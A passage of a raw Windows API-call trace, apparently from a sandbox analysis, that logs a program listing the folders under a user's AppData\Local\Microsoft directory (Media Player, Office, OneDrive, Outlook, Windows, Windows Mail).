cFileName="Recovery", cAlternateFileName="")) returned 0 [0281.561] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.562] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0281.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.562] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player", lpFilePart=0x0) returned 0x37 [0281.563] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.564] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b5b110, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2ada6de0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x105000, dwReserved0=0x0, dwReserved1=0x0, cFileName="CurrentDatabase_372.wmdb", cAlternateFileName="CURREN~1.WMD")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79b5b110, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x2acc25a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x2acc25a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x1106e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalMLS_3.wmdb", cAlternateFileName="LOCALM~1.WMD")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7983b430, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7983b430, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0281.564] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0281.565] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcba84960, ftCreationTime.dwHighDateTime=0x1d706b2, ftLastAccessTime.dwLowDateTime=0xcba84960, ftLastAccessTime.dwHighDateTime=0x1d706b2, ftLastWriteTime.dwLowDateTime=0xcba84960, ftLastWriteTime.dwHighDateTime=0x1d706b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0281.565] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.566] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0281.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.566] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office", lpFilePart=0x0) returned 0x31 [0281.567] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.567] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x5bb5ba10, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x5bb5ba10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x14ff8dd0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x2dbcc430, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2dbcc430, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16.0", cAlternateFileName="")) returned 1 [0281.567] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 1 [0281.568] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5bb5ba10, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x44005180, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x44005180, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OTele", cAlternateFileName="")) returned 0 [0281.568] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.568] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0281.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.569] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive", lpFilePart=0x0) returned 0x33 [0281.569] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.569] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.569] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe91c6830, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf26feb50, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="17.3.4604.0120", cAlternateFileName="173460~1.012")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf26feb50, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf26feb50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe9617010, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x44aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 1 [0281.570] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8a7c4d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8a7c4d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8a7c4d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup", cAlternateFileName="")) returned 0 [0281.570] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.571] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0281.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.571] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x32 [0281.572] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.572] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x23884f50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x23884f50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.572] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ce8e9d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2ce8e9d0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2ce8e9d0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gliding", cAlternateFileName="")) returned 1 [0281.572] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d32b470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21cff0f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21cff0f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x0, cFileName="mapisvc.inf", cAlternateFileName="")) returned 1 [0281.573] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 1 [0281.573] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23884f50, ftCreationTime.dwHighDateTime=0x1d7100d, ftLastAccessTime.dwLowDateTime=0x242a2cd0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x242a2cd0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 0 [0281.573] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0281.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.574] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows", lpFilePart=0x0) returned 0x32 [0281.574] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.575] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x107d8460, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x10aabe80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x10aabe80, ftLastWriteTime.dwHighDateTime=0x1d706a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x46c35e30, ftLastAccessTime.dwHighDateTime=0x1d7a944, ftLastWriteTime.dwLowDateTime=0x46c35e30, ftLastWriteTime.dwHighDateTime=0x1d7a944, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Burn", cAlternateFileName="")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x798152d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x462fb4a0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x462fb4a0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Caches", cAlternateFileName="")) returned 1 [0281.575] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x182897a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Explorer", cAlternateFileName="")) returned 1 [0281.576] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x797ef170, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x797ef170, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaef3b9d6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameExplorer", cAlternateFileName="GAMEEX~1")) returned 1 [0281.577] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x797c9010, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79b34fb0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe75c620, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0281.577] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb1ed8fe0, ftCreationTime.dwHighDateTime=0x1d73a91, ftLastAccessTime.dwLowDateTime=0xa18da600, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xa18da600, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell", cAlternateFileName="POWERS~1")) returned 1 [0281.577] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7977cd50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7977cd50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96dfdac, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ringtones", cAlternateFileName="RINGTO~1")) returned 1 [0281.578] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.578] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0281.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.579] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0281.579] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.580] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.580] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0281.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.581] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0281.581] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, 